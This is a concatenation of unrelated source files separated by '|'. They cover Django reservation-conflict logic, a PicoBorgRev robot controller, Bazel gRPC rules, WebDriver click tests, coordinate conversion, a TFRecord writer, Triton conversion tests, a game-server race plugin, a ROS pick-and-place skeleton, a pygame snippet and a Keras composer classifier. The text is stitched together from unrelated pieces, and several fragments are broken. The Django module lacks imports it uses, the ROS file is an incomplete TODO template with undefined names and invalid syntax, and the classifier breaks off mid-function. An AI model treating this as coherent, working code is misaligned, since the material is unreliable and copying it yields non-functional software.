from django.utils.translation import ugettext_lazy as _
#
# Conflict
#
class Conflict():
def __init__(self, conflicting_reservations, val_error):
self.conflicting_reservations = conflicting_reservations
self.val_error = val_error
#
# get_conflicting_reservations
#
def get_conflicting_reservations(new_reservation, reservation_list):
start_time = new_reservation.start_time
end_time = new_reservation.end_time
conflicts_list = []
for reservation in reservation_list:
existing_start_time = reservation.start_time
existing_end_time = reservation.end_time
# error: start time appears in existing reservation slot
if start_time >= existing_start_time and start_time < existing_end_time:
conflicts_list.append(reservation)
continue
# error: end time appears in existing reservation slot
if end_time > existing_start_time and end_time <= existing_end_time:
conflicts_list.append(reservation)
continue
# error: reservation encompasses old reservation
if start_time < existing_start_time and end_time > existing_end_time:
conflicts_list.append(reservation)
continue
return conflicts_list
#
# get_conflicts
#
def get_conflicts(new_reservation):
start_time = new_reservation.start_time
end_time = new_reservation.end_time
resource = new_reservation.resource
conflict_list = []
# 1. Check if reservation in resource availability window
# error: start time not in resource availability window
if start_time < resource.start_time or start_time > resource.end_time:
conflict_list.append(Conflict([], ValidationError(
_('Start time outside resource availability window.'),
code='invalid')))
# error: end time not in resource availability window
# <= : reservation must be at least 1 minute
if end_time <= resource.start_time or end_time > resource.end_time:
conflict_list.append(Conflict([], ValidationError(
_('End time outside resource availability window.'),
code='invalid')))
# 2. Check that user doesn't have another reservation that conflicts with this time slot (self-conflict)
global_self_reservations = Reservation.objects.filter(owner=new_reservation.owner)
global_self_conflicts = get_conflicting_reservations(new_reservation, global_self_reservations)
total_global_self_conflicts = len(global_self_conflicts)
if total_global_self_conflicts > 0:
conflict_list.append(Conflict(global_self_conflicts, ValidationError(
_('You have an existing reservation that conflicts with the requested time slot.'),
code='invalid')))
# 3. Check reservation doesn't conflict with other reservations for this resource
# filter self conflicts with this resource as we already returned them with global_conflicts
local_other_reservations = Reservation.objects.filter(resource=resource).exclude(owner=new_reservation.owner)
local_other_conflicts = get_conflicting_reservations(new_reservation, local_other_reservations)
local_self_reservations = Reservation.objects.filter(resource=resource, owner=new_reservation.owner)
local_self_conflicts = get_conflicting_reservations(new_reservation, local_self_reservations)
total_local_other_conflicts = len(local_other_conflicts)
total_local_self_conflicts = len(local_self_conflicts)
total_local_conflicts = total_local_other_conflicts + total_local_self_conflicts
if total_local_conflicts >= resource.capacity:
conflict_list.append(Conflict(local_other_conflicts, ValidationError(
_('Resource at max capacity for requested time slot.'),
code='invalid')))
return conflict_list
|
from picoborgrev.PicoBorgRev import PicoBorgRev
from calibrate_tracks import get_char
import sys
class basic_controls():
def __init__(self):
self.ctl = PicoBorgRev()
self.ctl.Init()
def go(self, power=0.25):
self.ctl.SetMotors(power)
def stop(self):
self.ctl.SetMotors(0)
def right(self, power=0.5):
self.ctl.SetMotor1(power)
def left(self, power=0.5):
self.ctl.SetMotor2(power)
def back(self, power=-0.25):
self.ctl.SetMotors(power)
if __name__ == '__main__':
print "Simple movement controller. Press w/s to increase/decrease left track speed, o/k for the right.\
Press <space> to stop the robot, or q to end the program to stop the robot"
raw_input("\nPress enter key to continue, or ctrl-c to quit now.")
pico = PicoBorgRev()
pico.Init()
R_SPEED = 0
L_SPEED = 0
SPEED_INCREMENT = 0.1
offset = -0.05
while True:
try:
pico.SetMotor1(R_SPEED + offset)
pico.SetMotor2(L_SPEED)
key = get_char()
if key == 'w' or key == 'W':
L_SPEED += SPEED_INCREMENT
elif key == 's' or key == 'S':
L_SPEED -= SPEED_INCREMENT
if key == 'o' or key == 'O':
R_SPEED += SPEED_INCREMENT
elif key == 'k' or key == 'K':
R_SPEED -= SPEED_INCREMENT
elif key == ' ':
L_SPEED = 0
R_SPEED = 0
elif key == 'q':
raise KeyboardInterrupt
print "Left: {:+.2f}\tRight: {:+.2f}".format(L_SPEED, R_SPEED)
except KeyboardInterrupt:
pico.SetMotors(0)
print "Done."
sys.exit(0)
|
load("@build_stack_rules_proto//:plugin.bzl", "ProtoPluginInfo")
load("@protobuf_py_deps//:requirements.bzl", protobuf_requirements = "all_requirements")
load("@grpc_py_deps//:requirements.bzl", grpc_requirements = "all_requirements")
load(
"@build_stack_rules_proto//:aspect.bzl",
"ProtoLibraryAspectNodeInfo",
"proto_compile_aspect_attrs",
"proto_compile_aspect_impl",
"proto_compile_attrs",
"proto_compile_impl",
)
python_grpclib_compile_aspect = aspect(
attr_aspects = ["deps"],
attrs = dict(
proto_compile_aspect_attrs,
_plugins = attr.label_list(
doc = "List of protoc plugins to apply",
providers = [ProtoPluginInfo],
default = [
str(Label("@build_stack_rules_proto//python:python")),
str(Label("//:grpc_python")),
],
),
),
provides = [
"proto_compile",
ProtoLibraryAspectNodeInfo,
],
implementation = proto_compile_aspect_impl,
)
_rule = rule(
attrs = dict(
proto_compile_attrs,
deps = attr.label_list(
mandatory = True,
providers = [
ProtoInfo,
"proto_compile",
ProtoLibraryAspectNodeInfo,
],
aspects = [python_grpclib_compile_aspect],
),
),
implementation = proto_compile_impl,
)
def python_grpclib_compile(**kwargs):
_rule(
verbose_string = "%s" % kwargs.get("verbose", 0),
plugin_options_string = ";".join(kwargs.get("plugin_options", [])),
**kwargs
)
def python_grpclib_library(**kwargs):
name = kwargs.get("name")
deps = kwargs.get("deps")
visibility = kwargs.get("visibility")
name_pb = name + "_pb"
python_grpclib_compile(
name = name_pb,
transitive = kwargs.pop("transitive", True),
transitivity = kwargs.pop("transitivity", {}),
verbose = kwargs.pop("verbose", 0),
visibility = visibility,
deps = deps,
)
py_library(
name = name,
srcs = [name_pb],
# This magically adds REPOSITORY_NAME/PACKAGE_NAME/{name_pb} to PYTHONPATH
imports = [name_pb],
visibility = visibility,
deps = depset(protobuf_requirements + grpc_requirements).to_list(),
)
|
import pytest
from tests.support.asserts import assert_error, assert_success
def element_click(session, element):
return session.transport.send(
"POST", "session/{session_id}/element/{element_id}/click".format(
session_id=session.session_id,
element_id=element.id))
def test_display_none(session, inline):
session.url = inline("""<button style="display: none">foobar</button>""")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_visibility_hidden(session, inline):
session.url = inline("""<button style="visibility: hidden">foobar</button>""")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_hidden(session, inline):
session.url = inline("<button hidden>foobar</button>")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_disabled(session, inline):
session.url = inline("""<button disabled>foobar</button>""")
element = session.find.css("button", all=False)
response = element_click(session, element)
assert_success(response)
@pytest.mark.parametrize("transform", ["translate(-100px, -100px)", "rotate(50deg)"])
def test_element_not_interactable_css_transform(session, inline, transform):
session.url = inline("""
<div style="width: 500px; height: 100px;
background-color: blue; transform: {transform};">
<input type=button>
</div>""".format(transform=transform))
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_element_not_interactable_out_of_view(session, inline):
session.url = inline("""
<style>
input {
position: absolute;
margin-top: -100vh;
background: red;
}
</style>
<input>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
@pytest.mark.parametrize("tag_name", ["div", "span"])
def test_zero_sized_element(session, inline, tag_name):
session.url = inline("<{0}></{0}>".format(tag_name))
element = session.find.css(tag_name, all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
def test_element_intercepted(session, inline):
session.url = inline("""
<style>
div {
position: absolute;
height: 100vh;
width: 100vh;
background: blue;
top: 0;
left: 0;
}
</style>
<input type=button value=Roger>
<div></div>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element click intercepted")
def test_element_intercepted_no_pointer_events(session, inline):
session.url = inline("""<input type=button value=Roger style="pointer-events: none">""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element click intercepted")
def test_element_not_visible_overflow_hidden(session, inline):
session.url = inline("""
<style>
div {
overflow: hidden;
height: 50px;
background: green;
}
input {
margin-top: 100px;
background: red;
}
</style>
<div><input></div>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element not interactable")
|
def auto_loop_setup():
try:
import uvloop # noqa
except ImportError: # pragma: no cover
from uvicorn.loops.asyncio import asyncio_setup as loop_setup
loop_setup()
else:
from uvicorn.loops.uvloop import uvloop_setup
uvloop_setup()
|
import numpy as np
from sweref99 import projections
from kmm.positions.positions import Positions
tm = projections.make_transverse_mercator("SWEREF_99_TM")
def geodetic(positions: Positions):
dataframe = positions.dataframe
if len(dataframe) == 0:
dataframe = dataframe.assign(longitude=[], latitude=[])
else:
latitude, longitude = zip(*[
tm.grid_to_geodetic(coordinate.sweref99_tm_x, coordinate.sweref99_tm_y)
for coordinate in dataframe[["sweref99_tm_x", "sweref99_tm_y"]].itertuples()
])
dataframe = dataframe.assign(longitude=longitude, latitude=latitude)
return positions.replace(dataframe=dataframe)
def test_geodetic():
positions = Positions.from_path("tests/ascending_B.kmm2")
df = geodetic(positions).dataframe
assert ((df["latitude"] < 68) & (df["latitude"] > 55)).all()
assert ((df["longitude"] < 25) & (df["longitude"] > 7)).all()
def test_sweref_library():
lat, lon = 57.705918, 11.987286
northing, easting = tm.geodetic_to_grid(lat, lon)
lat2, lon2 = tm.grid_to_geodetic(northing, easting)
assert np.allclose([lat, lon], [lat2, lon2])
|
# Copyright 2020 The OpenAGI Datum Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from itertools import islice
from typing import Any, Callable, Dict, List, Optional, Tuple
import numpy as np
import tensorflow as tf
from absl import logging
from datum.cache.bucket import DuplicatedKeysError, Shuffler
from datum.utils import shard_utils
from datum.utils.common_utils import datum_to_type_and_shape
from datum.utils.tqdm_utils import tqdm
from datum.utils.types_utils import DatumType
class TFRecordWriter():
"""TFRecord writer interface.
This module is used to convert data into serialized binary string and to write data
as tfrecords to disk. It uses a cache to shuffle and store intermediate serialized binary
string tensors.
Args:
generator: an instance of a datum generator.
serializer: an instance of datum serializer.
path: absolute path to store the tfrecords data and metadata.
split: name of the split.
total_examples: number of examples to write.
gen_kwargs: optional keyword arguments to used when calling geenrator.
"""
def __init__(self,
generator: Callable,
serializer: Callable,
path: str,
split: str,
total_examples: int,
sparse_features: Optional[List[str]] = None,
**gen_kwargs: Any):
""" path = /tmp/test/
split = train/val/test
"""
self.generator = generator
self.serializer = serializer
self.shuffler = Shuffler(os.path.dirname(path), split)
self._base_path = path
self.path = os.path.join(path, split)
self.current_examples = 0
self.total_examples = total_examples
self.split = split
self.sparse_features = sparse_features or []
self.gen_kwargs = gen_kwargs or {}
self.gen_kwargs.update({'split': self.split})
def cache_records(self) -> None:
"""Write data to cache."""
for key, datum in tqdm(self.generator(**self.gen_kwargs),
unit=" examples",
total=self.total_examples,
leave=False):
if self.sparse_features:
logging.debug(f'Adding shapes info to datum for sparse features: {self.sparse_features}.')
datum = self.add_shape_fields(datum)
serialized_record = self.serializer(datum)
self.shuffler.add(key, serialized_record)
self.current_examples += 1
with tf.io.gfile.GFile(os.path.join(self._base_path, 'datum_to_type_and_shape_mapping.json'),
'w') as js_f:
logging.info(f'Saving datum type and shape metadata to {self._base_path}.')
types_shapes = datum_to_type_and_shape(datum, self.sparse_features)
json.dump(types_shapes, js_f)
def create_records(self) -> None:
"""Create tfrecords from given generator."""
logging.info('Caching serialized binary example to cache.')
self.cache_records()
logging.info('Writing data from cache to disk in `.tfrecord` format.')
self.flush()
def add_shape_fields(self, datum: DatumType) -> DatumType:
"""Add tensor shape information to dataset metadat json file and tfrecords. This is required when
dealing wit sparse tensors. As we need to revert back the original shape of tensor, when tensor
dimension >= 2.
Args:
datum: a dict, input datum.
Returns:
input dict updated with sprase tensors shape information.
"""
new_fields = {}
for sparse_key in self.sparse_features:
if sparse_key in datum:
value = np.asarray(datum[sparse_key])
if len(value.shape) >= 2:
new_fields[sparse_key + '_shape'] = list(value.shape)
datum.update(new_fields)
return datum
def flush(self) -> None:
"""Wirte tfrecord files to disk."""
self.flush_records()
def flush_records(self) -> Tuple[Dict[str, Dict[str, int]], int]:
"""Write tfrecord files to disk.
Returns:
a tuple containing a dict with shard info and the size of shuffler.
"""
logging.info(f"Shuffling and writing examples to {self.path}")
shard_specs = shard_utils.get_shard_specs(self.current_examples, self.shuffler.size,
self.shuffler.bucket_lengths, self.path)
examples_generator = iter(
tqdm(self.shuffler, total=self.current_examples, unit=" examples", leave=False))
try:
for shard_spec in shard_specs:
iterator = islice(examples_generator, 0, shard_spec.examples_number)
shard_utils.write_tfrecord(shard_spec.path, iterator)
except DuplicatedKeysError as err:
shard_utils.raise_error_for_duplicated_keys(err)
shard_info = {
self.split: {spec.path.split('/')[-1]: int(spec.examples_number)
for spec in shard_specs}
}
self.save_shard_info(shard_info)
logging.info(f"Done writing {self.path}. Shard lengths: {list(shard_info[self.split].values())}")
return shard_info, self.shuffler.size
def save_shard_info(self, shard_info: Dict[str, Dict[str, int]]) -> None:
"""Save shard info to disk.
Args:
shard_info: input shard info dict.
"""
if os.path.isfile(os.path.join(self._base_path, 'shard_info.json')):
with tf.io.gfile.GFile(os.path.join(self._base_path, 'shard_info.json'), 'r') as si_f:
prev_shard_info = json.load(si_f)
shard_info.update(prev_shard_info)
with tf.io.gfile.GFile(os.path.join(self._base_path, 'shard_info.json'), 'w') as si_f:
json.dump(shard_info, si_f)
|
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from tempfile import TemporaryDirectory
from pathlib import Path
import filecmp
from towhee import ops
from serve.triton.to_triton_models import PyOpToTriton, PreprocessToTriton, PostprocessToTriton,ModelToTriton
from . import EXPECTED_FILE_PATH
class TestPyOpToTriton(unittest.TestCase):
'''
Test pyop to triton.
'''
def test_py_to_triton(self):
with TemporaryDirectory(dir='./') as root:
op = ops.local.triton_py().get_op()
to_triton = PyOpToTriton(op, root, 'py_to_triton_test', 'local', 'triton_py', {})
to_triton.to_triton()
expect_root = Path(EXPECTED_FILE_PATH) / 'py_to_triton_test'
dst = Path(root) / 'py_to_triton_test'
self.assertTrue(filecmp.cmp(expect_root / 'config.pbtxt', dst / 'config.pbtxt'))
self.assertTrue(filecmp.cmp(expect_root / '1' / 'model.py', dst / '1' / 'model.py'))
class TestPreprocessor(unittest.TestCase):
'''
Test nnop process to triton
'''
def test_processor(self):
with TemporaryDirectory(dir='./') as root:
op = ops.local.triton_nnop(model_name='test').get_op()
to_triton = PreprocessToTriton(op, root, 'preprocess')
to_triton.to_triton()
expect_root = Path(EXPECTED_FILE_PATH) / 'preprocess'
dst = Path(root) / 'preprocess'
self.assertTrue(filecmp.cmp(expect_root / 'config.pbtxt', dst / 'config.pbtxt'))
pk = dst / '1' / 'preprocess.pickle'
m_file = dst / '1' / 'model.py'
self.assertTrue(pk.is_file())
self.assertTrue(m_file.is_file())
class TestPostprocessor(unittest.TestCase):
'''
Test nnop process to triton
'''
def test_processor(self):
with TemporaryDirectory(dir='./') as root:
op = ops.local.triton_nnop(model_name='test').get_op()
to_triton = PostprocessToTriton(op, root, 'postprocess')
to_triton.to_triton()
expect_root = Path(EXPECTED_FILE_PATH) / 'postprocess'
dst = Path(root) / 'postprocess'
self.assertTrue(filecmp.cmp(expect_root / 'config.pbtxt', dst / 'config.pbtxt'))
pk = dst / '1' / 'postprocess.pickle'
m_file = dst / '1' / 'model.py'
self.assertTrue(pk.is_file())
self.assertTrue(m_file.is_file())
class TestToModel(unittest.TestCase):
'''
Test nnop model to triton.
'''
def test_to_model(self):
with TemporaryDirectory(dir='./') as root:
op = ops.local.triton_nnop(model_name='test').get_op()
to_triton = ModelToTriton(op.model, root, 'nnop')
to_triton.to_triton()
expect_root = Path(EXPECTED_FILE_PATH) / 'nnop'
dst = Path(root) / 'nnop'
filecmp.cmp(expect_root / 'config.pbtxt', dst / 'config.pbtxt')
|
"""
"""
## python imports
from random import randint
## source.python imports
from effects.base import TempEntity
from engines.sound import StreamSound
from engines.precache import Model
from entities.entity import Entity
from filters.players import PlayerIter
from listeners.tick import Repeat
from weapons.manager import weapon_manager
## warcraft.package imports
from warcraft.commands.messages import send_wcs_saytext_by_index
from warcraft.players import player_dict
from warcraft.race import Race
from warcraft.registration import events, clientcommands
from warcraft.skill import Skill
from warcraft.utility import classproperty, CooldownDict
## __all__ declaration
__all__ = ("OrcishHorde", )
## OrcishHorde declaration
chain_sound = StreamSound('source-python/warcraft/chain_lightning.wav', download=True)
root_sound = StreamSound('source-python/warcraft/root.mp3', download=True)
class OrcishHorde(Race):
image = "https://liquipedia.net/commons/images/thumb/7/76/Orcrace.png/200px-Orcrace.png"
@classproperty
def description(cls):
return 'Recoded Orcish Horde. (Kryptonite)'
@classproperty
def max_level(cls):
return 99
@classproperty
def requirement_sort_key(cls):
return 3
@OrcishHorde.add_skill
class BloodFury(Skill):
laser = Model('sprites/lgtning.vmt', True)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.can_crit = False
self.counter = 0
self.repeater = None
self.beam = TempEntity('BeamPoints', alpha=255, red=0, green=255, blue=0,
life_time=1.0, model_index=self.laser.index,
start_width=3, end_width=3, frame_rate=255,
halo_index=self.laser.index)
@classproperty
def description(cls):
return 'You are able to hit vital points, causing major damage.'
@classproperty
def max_level(cls):
return 8
_msg_a = '{{GREEN}}Critical strike {{PALE_GREEN}}on {{RED}}{name} {{PALE_GREEN}}caused {{DULL_RED}}vital damage!'
@events('player_spawn', 'skill_level_up')
def _on_spawn_start_repeat(self, player, **kwargs):
self.can_crit = True
self.counter = 0
self.repeater = Repeat(self._on_game_tick, kwargs={}, cancel_on_level_end=True)
self.repeater.start(0.1)
@events('player_death')
def _on_death_stop_repeat(self, player, **kwargs):
if self.repeater:
self.repeater.stop()
@events('player_pre_attack')
def _on_player_pre_attack(self, attacker, victim, info, **kwargs):
if self.level == 0:
return
if self.can_crit:
info.damage *= 1 + 0.2 * self.level
send_wcs_saytext_by_index(self._msg_a.format(name=victim.name), attacker.index)
weapon = attacker.active_weapon
if weapon and weapon.weapon_name.split("_")[-1] not in weapon_manager.projectiles:
start_location = weapon.origin.copy()
start_location.z += 40
end_location = attacker.get_view_coordinates()
self.beam.create(start_point=start_location, end_point=end_location)
self.can_crit = False
self.counter = 0
def _on_game_tick(self):
self.counter += 1
if self.counter == 256 - (self.level * 2):
self.can_crit = True
@OrcishHorde.add_skill
class EarthgrabTotem(Skill):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.model = Model('sprites/blueflare1.vmt', True)
self.model._precache()
self.effect = TempEntity('BeamRingPoint', start_radius=120,
end_radius=0, model_index=self.model.index, halo_index=self.model.index,
life_time=1.5, amplitude=10, red=10, green=255, blue=10, alpha=245, flags=0,
start_width=6, end_width=6)
if not root_sound.is_precached:
root_sound.precache()
@classproperty
def description(cls):
return 'Root your enemies to the ground, 16-24% chance.'
@classproperty
def max_level(cls):
return 8
_msg_a = '{{GREEN}}Rooted {{RED}}{name} {{PALE_GREEN}}to the ground.'
_msg_b = '{{PALE_GREEN}}You have been {{GREEN}}rooted {{PALE_GREEN}}to the ground by {{RED}}{name}.'
@events('player_pre_attack')
def _on_player_pre_attack(self, attacker, victim, **kwargs):
if self.level == 0:
return
if randint(1, 100) <= 16 + self.level and not victim.stuck:
victim.stuck = True
victim.delay(1.5, victim.__setattr__, args=('stuck', False))
send_wcs_saytext_by_index(self._msg_a.format(name=victim.name), attacker.index)
send_wcs_saytext_by_index(self._msg_b.format(name=attacker.name), victim.index)
root_sound.index = victim.index
root_sound.origin = victim.origin
root_sound.play()
self.effect.create(center=victim.origin)
self.effect.create(center=victim.origin, start_radius=80)
@OrcishHorde.add_skill
class Reincarnation(Skill):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.weapons = []
self.location = None
@classproperty
def description(cls):
return 'Upon death, the shamans will ressurect you in your old location, 25-33% chance.'
@classproperty
def max_level(cls):
return 8
_msg_a = '{ORANGE}Respawning {PALE_GREEN}in {GREEN}1 {PALE_GREEN}second.'
def _force_drop_weapons(self, player):
for index in player.weapon_indexes(not_filters='knife'):
entity = Entity(index)
player.drop_weapon(entity.pointer, None, None)
@events('player_pre_victim')
def _on_pre_death_obtain_weapons(self, victim, **kwargs):
self.weapons = [Entity(index).class_name for index in victim.weapon_indexes(
not_filters='knife')
]
self.location = victim.origin.copy()
self.location.z += 1
@events('player_death')
def _on_death_respawn(self, player, **kwargs):
if self.level == 0:
return
if randint(1, 101) <= 25 + self.level:
player.delay(1.5, player.spawn)
player.delay(2, self._force_drop_weapons, args=(player, ))
for weapon in self.weapons:
player.delay(3, player.give_named_item, args=(weapon, ))
if self.location:
player.delay(2.2, player.teleport, args=(self.location, ))
send_wcs_saytext_by_index(self._msg_a, player.index)
@OrcishHorde.add_skill
class ChainLightning(Skill):
laser = Model('sprites/lgtning.vmt', True)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cooldowns = CooldownDict()
self.beam = TempEntity('BeamPoints', alpha=255, red=255, green=200, blue=200,
life_time=1.0, start_width=15, end_width=15, frame_rate=255)
self.laser = Model('sprites/lgtning.vmt')
self.laser._precache()
@classproperty
def description(cls):
return 'You channel a lightning rod which ricochets from player to player.'
@classproperty
def max_level(cls):
return 8
@classmethod
def is_available(cls, player):
return player.race.level > 8
_msg_a = '{GREEN}Chain Lightning {RED}hit enemies{PALE_GREEN}!'
_msg_c = '{{GREEN}}Chain Lightning {{PALE_GREEN}}is on cooldown for {{DULL_RED}}{time:0.1f} {{PALE_GREEN}}seconds.'
_msg_f = '{GREEN}Chain Lightning {PALE_GREEN}found {DULL_RED}no enemies{PALE_GREEN}!'
def _find_closest_player(self, player, team_index, length=99999, exclusions=[]):
_target = None
for target in player_dict.values():
if target.dead or target.team_index == team_index or target in exclusions or target.ultimate_immune:
continue
_distance = player.origin.get_distance(target.origin)
if _distance < length:
_target = target
length = _distance
return _target
def _find_chain_players(self, player, length, count):
_last_target = player
team_index = player.team_index
_targets = []
while count > 0:
if not _last_target:
break
_target = self._find_closest_player(_last_target, team_index, length, _targets)
_targets.append(_target)
_last_target = _target
count -= 1
return _targets
@events('player_spawn')
def _on_player_spawn_reset(self, player, **kwargs):
self.cooldowns['ultimate'] = 4
@clientcommands('ultimate')
def _on_player_ultimate(self, player, **kwargs):
if self.level == 0:
return
_cooldown = self.cooldowns['ultimate']
if _cooldown <= 0:
last_target = player
targets = self._find_chain_players(player, 500, 3)
if targets[0] == None:
send_wcs_saytext_by_index(self._msg_f, player.index)
return
for target in targets:
if not target:
continue
target.take_damage(20+5*self.level, attacker_index=player.index, skip_hooks=True)
location1 = last_target.origin.copy()
location2 = target.origin.copy()
location1.z += 40
location2.z += 40
self.beam.create(start_point=location1, end_point=location2, halo=self.laser, model=self.laser)
last_target = target
chain_sound.index = player.index
chain_sound.origin = player.origin
chain_sound.play()
send_wcs_saytext_by_index(self._msg_a, player.index)
self.cooldowns['ultimate'] = 20
else:
send_wcs_saytext_by_index(self._msg_c.format(time=_cooldown), player.index) |
from .text_classifier import TextClassifier # noqa
|
#!/usr/bin/env python
# Import modules
import numpy as np
from visualization_msgs.msg import Marker
import rospy
import tf
from geometry_msgs.msg import Pose
from std_msgs.msg import String
from franka_description.srv import *
# function to load parameters and request PickPlace service
def franka_mover():
# TODO: Get parameter "/grasp_list" from ros param server and save it to variable grasp_list, grasp_list is a python dictionary data type
# Loop through each picking item, the name and pose of the picking items is stored in ros parameter "/grasp_list"
for obj in grasp_list:
# TODO: get the name of picking item and store it in ROS message type String
object_name = String()
# TODO: get the pose of picking item and store it in ROS message type Pose. Please add an offset of 0.13 meter above the items's z value (grasp_list[object_name]['position']['z'] + 0.13).
pick_pose = Pose()
# Wait for 'pick_place_routine' service to come up
rospy.wait_for_service('pick_place_routine')
try:
pick_place_routine = rospy.ServiceProxy('pick_place_routine', PickPlace)
# TODO: Insert your message variables to be sent as a service request
resp = pick_place_routine(OBJECT_NAME, PICK_POSE)
print ("Response: ",resp.success)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
if __name__ == '__main__':
# TODO: ROS node initialization
# TODO: call the robot mover function defined above
# TODO: Spin while node is not shutdown
|
import pygame
pygame.init()
pygame.mixer.music.load('Desafio21.mp3')
pygame.mixer.music.play()
while pygame.mixer.music.get_busy(): pass |
#!/usr/bin/env python
#________INDEX____________.
# |
# 6 functions |
# (6=3+2+1) |
# |
# -3 auxiliary |
# -2 plots) |
# -1 main) |
# |
# (if __name__==__main__) |
#_________________________|
import os
import sys
import pickle
import re
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from joblib import dump,load
from keras.initializers import LecunNormal
from keras import Sequential, backend
from keras.losses import categorical_crossentropy
from keras.layers import Dense
from keras.optimizers import SGD
from keras.models import load_model
from keras.metrics import AUC
from math import ceil
from random import randrange, sample, choice
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import OneHotEncoder
from sympy.solvers import solve
from sympy import Symbol
from time import sleep
#----------------------------------------------------
# Three auxiliary generic function
#
# (1) "tags_dict" : mapping from numbers
# to composers names
#
# (2) "pickle_bridge" : recieves and returns
# the same data. Optionally
# it saves it before return
#
# (3) "backend_wrapper" : executes functions and
# before returning it
# manually asks for memory
# release; in case this
# script is iterated
#---------------------------------------------------
# (1)
def tags_dict():
"""
ENCODER
names (e.g. Bach) <--> numbers (0-7)
"""
with open('datasets/tags.dat','r') as f:
tags_list = f.readlines()
tags = {}
key_pattern = re.compile('item:[ ]+([a-z]+)',re.I)
item_pattern = re.compile('key:[ ]+([0-9]+)',re.I)
for x in tags_list:
tags[re.search(
key_pattern, x
).group(1)] = re.search(
item_pattern, x
).group(1)
inverted_tags = {}
for k,i in tags.items(): inverted_tags[i] = k
return tags, inverted_tags
# (2)
def pickle_bridge(A,B):
"""
If you want to save the output,
The following can be set to False
"""
if True:
return A,B
info = A['info']
with open(f"info.pickle", "wb") as f:
pickle.dump(A, f)
return A,B
# (3)
def backend_wrapper(process):
"""
Memory leak protection:
backend_wrapper(main(foo))
should help in the releasing
of plots and tensorflow
"""
debug = True
if debug: process()
else:
backend.clear_session()
try:
process()
print('SUCCESS!')
except Exception as ins:
print('ERROR: unexpected. \n',ins.args)
backend.clear_session()
return
#----------------------------------------------------
# Two plotting functions
#
# (4) "simple_plotter" : recieves predictions and,
# if it was a neural network,
# plots ROC curves, output
# weights, and training curves
#
# (5) "multi_rocker" : plots the one-vs-all ROC's
#
#---------------------------------------------------
# (4)
def simple_plotter(h: dict, case: str):
# If 'forest': dont show info
if case=='forest': return
fs = 12
# A plotting auxiliary function
def individual_weights(ytrue_, ypred_, axy, flag):
if len(ytrue_)==len(ypred_): L = len(ypred_)
else: len_error(ytrue_,ypred_)
temp = pd.concat(
[
pd.DataFrame(
{
f'prediction {flag}':
[ypred_[i] for i in range(L) if ytrue_[i]==1],
'type':
f'positive {flag}' ,
}
),
pd.DataFrame(
{
f'prediction {flag}':
[ypred_[i] for i in range(L) if ytrue_[i]==0],
'type':
f'negative {flag}',
}
),
]
)
for x in [f'positive {flag}',f'negative {flag}']:
sns.distplot(temp[temp['type']==x][f'prediction {flag}'],
bins=[y/10 for y in range(11)],
ax=axy, kde=False,
norm_hist=True,
label=x,)
axy.set_xlim(0,1)
axy.set_xlabel('Output Weights',fontsize=fs)
axy.set_title('output weights por categoria',fontsize=fs)
axy.axvline(x=0.5,c='r',lw=1,ls='-')
# Create the Figure and preprocess data
f,ax = plt.subplots(2,5,figsize=(21,12))
L = h['ytrue'].shape[0]
ytrue, ypred = h['ytrue'], h['ypred']
del h['ytrue']
del h['ypred']
h = pd.DataFrame(h)
h['ref 100%']=1
h['ref null hypothesis']=0.5
fit_data = {'train auc': np.mean(h['auc'][-3:]),
'validation auc': np.mean(h['val_auc'][-3:]),
'train loss': np.mean(h['loss'][-3:]),
'validation loss':np.mean(h['val_loss'][-3:]),}
# PLOT 0: Training & Validation Curves VS Epochs
sns.lineplot(data=h, ax=ax[0,0])
ax[0,0].set_title(f'Loss & Accuracy vs Epochs',fontsize=fs)
ax[0,0].set_xlabel('epochs',fontsize=fs)
ax[0,0].set_ylim(0,2.5)
# PLOT 1: Validation set's ROC
multi_rocker(ax[0,1],ytrue,ypred)
ax[0,1].set_ylim(0,1.05)
ax[0,1].set_xlim(0,1)
ax[0,1].set_title(f'ROC curves',fontsize=fs)
ax[0,1].legend()
# PLOTS 2 TO 10: Output Weights "per Class" (i.e. per composer)
axind = {0:(0,2), 1:(0,3), 2:(0,4),
3:(1,0),4:(1,1),
5:(1,2),6:(1,3),7:(1,4),}
for J in range(len(ytrue[0])):
a = [x[J] for x in ytrue]
b = [x[J] for x in ypred]
individual_weights(
a,
b,
ax[axind[J] ],
J,
)
ax[axind[J]].legend()
# Tight Layout and save!
plt.tight_layout()
f.savefig('results/last-neural-network.png')
return
# (5)
def multi_rocker(
axy: type(plt.subplots()[1]),
y_trues: np.ndarray,
y_preds: np.ndarray,
):
"""
One-Vs-All ROC-curve:
"""
fpr = dict()
tags = tags_dict()[1]
tpr = dict()
roc_auc = dict()
